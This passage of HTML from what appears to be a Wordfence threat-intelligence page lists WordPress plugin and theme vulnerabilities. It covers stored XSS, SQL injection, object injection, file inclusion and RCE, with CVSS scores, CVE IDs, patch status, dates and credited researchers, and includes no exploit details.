<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-login-openid-2" target="_blank" rel="noopener">miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn) Pro Addon</a> <span class="wfvr-software-slug">[miniorange-login-openid]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ca648819-1771-405b-bec1-c511427aeea6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0cf965c9-32e4-4c8d-97cf-a30afdc5aac3" target="_blank" rel="noopener">Super Store Finder &lt;= 7.10 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81768" target="_blank" rel="noopener noreferrer">							CVE-2026-81768						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/superstorefinder-wp" target="_blank" rel="noopener">Super Store Finder</a> <span class="wfvr-software-slug">[superstorefinder-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0cf965c9-32e4-4c8d-97cf-a30afdc5aac3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/00f98ddd-69cc-4850-81e0-3da045d03775" target="_blank" rel="noopener">Tailored Tools &lt;= 3.0.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81765" target="_blank" rel="noopener noreferrer">							CVE-2026-81765						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tailored-tools" target="_blank" rel="noopener">Tailored Tools</a> <span class="wfvr-software-slug">[tailored-tools]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/v1t" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/efd10eb3421a6ca0a3d855ad7029a801.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="efd10eb3421a6ca0a3d855ad7029a801"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/v1t" target="_blank" rel="noopener">V1T</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/00f98ddd-69cc-4850-81e0-3da045d03775" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/990e04ed-ff17-4e10-9224-64a674a40416" target="_blank" rel="noopener">TranslatePress &lt;= 3.3.3 &#8211; Unauthenticated Stored Cross-Site Scripting via Comment Noise-Key Injection into HTML Parser</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76053" target="_blank" rel="noopener noreferrer">							CVE-2026-76053						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/translatepress-multilingual" target="_blank" rel="noopener">TranslatePress – Translate Multilingual sites with AI Translation</a> <span class="wfvr-software-slug">[translatepress-multilingual]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/990e04ed-ff17-4e10-9224-64a674a40416" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/55aa8929-7075-4fd3-a602-87faf0255862" target="_blank" rel="noopener">Uncode &lt;= 2.12.7 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81291" target="_blank" rel="noopener noreferrer">							CVE-2026-81291						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/uncode" target="_blank" rel="noopener">Uncode</a> <span class="wfvr-software-slug">[uncode]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/429c3eb56bea605e95a57ae93ae24c62.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="429c3eb56bea605e95a57ae93ae24c62"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/55aa8929-7075-4fd3-a602-87faf0255862" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/69a22238-88e8-4ff5-8e2b-8c58a04ff154" target="_blank" rel="noopener">WP Fastest Cache &lt;= 1.5.0 &#8211; Unauthenticated Stored Cross-Site Scripting via HTTP Host Header</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19760" target="_blank" rel="noopener noreferrer">							CVE-2026-19760						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-fastest-cache" target="_blank" rel="noopener">WP Fastest Cache – WordPress Cache Plugin</a> <span class="wfvr-software-slug">[wp-fastest-cache]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adrien-brunner" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/eefe3705b8f48b48303d7a95fe7a0ec3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="eefe3705b8f48b48303d7a95fe7a0ec3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adrien-brunner" target="_blank" rel="noopener">Adrien Brunner</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/69a22238-88e8-4ff5-8e2b-8c58a04ff154" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3560bf50-2190-4469-9d92-b6b59f118324" target="_blank" rel="noopener">WP Rocket &lt;= 3.21.0.1 &#8211; Unauthenticated Stored Cross-Site Scripting via Picture Source Attributes in rocket_beacon Endpoint</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5934" target="_blank" rel="noopener noreferrer">							CVE-2026-5934						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-rocket" target="_blank" rel="noopener">WP Rocket</a> <span class="wfvr-software-slug">[wp-rocket]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8ec93bb7e5ec96ab4636699e413382c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8ec93bb7e5ec96ab4636699e413382c9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener">Tin Pham (TF1T)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trong-pham-dtro" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4418c9327e7455cc20ecc3238895e0d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4418c9327e7455cc20ecc3238895e0d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trong-pham-dtro" target="_blank" rel="noopener">Trong Pham (dtro)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hao-ngo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/686db785ef138a2df1f8279970662a2a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="686db785ef138a2df1f8279970662a2a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hao-ngo" target="_blank" rel="noopener">Hao Ngo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3560bf50-2190-4469-9d92-b6b59f118324" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a8c2d1f-b744-4e4f-80d3-64f7c46e4395" target="_blank" rel="noopener">WP w3all phpBB &lt;= 3.0.6 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78293" target="_blank" rel="noopener noreferrer">							CVE-2026-78293						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-w3all-phpbb-integration" target="_blank" rel="noopener">WP w3all phpBB</a> <span class="wfvr-software-slug">[wp-w3all-phpbb-integration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lanlv" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a432bd51721d1298fe78607f1b39c071.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a432bd51721d1298fe78607f1b39c071"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lanlv" target="_blank" rel="noopener">lanlv</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a8c2d1f-b744-4e4f-80d3-64f7c46e4395" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af933be6-0a9c-4744-9de9-b70a07f037d5" target="_blank" rel="noopener">WPvivid — Backup, Migration &amp; Staging &lt; 0.9.133 &#8211; Authenticated (Administrator+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19722" target="_blank" rel="noopener noreferrer">							CVE-2026-19722						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpvivid-backuprestore" target="_blank" rel="noopener">WPvivid — Backup, Migration &amp; Staging</a> <span class="wfvr-software-slug">[wpvivid-backuprestore]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nir-yehoshua" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9786d2004e23d165ca5600a93fa2c533.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9786d2004e23d165ca5600a93fa2c533"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nir-yehoshua" target="_blank" rel="noopener">Nir Yehoshua</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af933be6-0a9c-4744-9de9-b70a07f037d5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aead557d-aec9-4218-9e5f-01b58432486f" target="_blank" rel="noopener">Events Manager &lt;= 7.3.7.4 &#8211; Authenticated (Administrator+) Local File Inclusion via &#8216;dbem_data[updates]&#8217; Array Keys</a></h4>
<div class="cvss-score-badge">6.6</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.6 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14280" target="_blank" rel="noopener noreferrer">							CVE-2026-14280						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-manager" target="_blank" rel="noopener">Events Manager – Calendar, Bookings, Tickets, and more!</a> <span class="wfvr-software-slug">[events-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aead557d-aec9-4218-9e5f-01b58432486f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/deb92657-3a28-44e3-bfd7-59f722869f5a" target="_blank" rel="noopener">Fluent Boards Pro &lt;= 2.0.11 &#8211; Authenticated (Editor+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">6.6</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.6 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78276" target="_blank" rel="noopener noreferrer">							CVE-2026-78276						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-boards-pro" target="_blank" rel="noopener">Fluent Boards Pro</a> <span class="wfvr-software-slug">[fluent-boards-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/deb92657-3a28-44e3-bfd7-59f722869f5a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/25d1e9a0-cbfc-41c4-a5a5-238fffb5324d" target="_blank" rel="noopener">User Frontend – Membership, User Registration, User Profile, User Directory &amp; Content Restriction with Frontend Post Submission &lt; 4.3.10 &#8211; Authenticated (Editor+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">6.6</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.6 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14558" target="_blank" rel="noopener noreferrer">							CVE-2026-14558						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-user-frontend" target="_blank" rel="noopener">User Frontend – Membership, User Registration, User Profile, User Directory &amp; Content Restriction with Frontend Post Submission</a> <span class="wfvr-software-slug">[wp-user-frontend]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hijun-kim" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6b8ada522225697cf6e18bf154ac5e7e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6b8ada522225697cf6e18bf154ac5e7e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hijun-kim" target="_blank" rel="noopener">Hijun Kim</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/25d1e9a0-cbfc-41c4-a5a5-238fffb5324d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1b07c449-eea5-4bf6-98a7-747358b423ee" target="_blank" rel="noopener">User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor &lt; 4.0.1 &#8211; Authenticated (Administrator+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">6.6</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.6 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76547" target="_blank" rel="noopener noreferrer">							CVE-2026-76547						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profile-builder" target="_blank" rel="noopener">User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor</a> <span class="wfvr-software-slug">[profile-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vivien-lebas" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d59af63987c0d31071cf741206b4470d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d59af63987c0d31071cf741206b4470d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vivien-lebas" target="_blank" rel="noopener">Vivien LEBAS</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1b07c449-eea5-4bf6-98a7-747358b423ee" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22337457-f040-489a-a6a5-d8cfcec329b5" target="_blank" rel="noopener">ACPT (Premium) &lt;= 2.0.63 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-32564" target="_blank" rel="noopener noreferrer">							CVE-2026-32564						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-custom-post-type" target="_blank" rel="noopener">ACPT (Premium)</a> <span class="wfvr-software-slug">[advanced-custom-post-type]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vdsec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a088a81982e769094818c68ff02325e8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a088a81982e769094818c68ff02325e8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vdsec" target="_blank" rel="noopener">VDsec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22337457-f040-489a-a6a5-d8cfcec329b5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
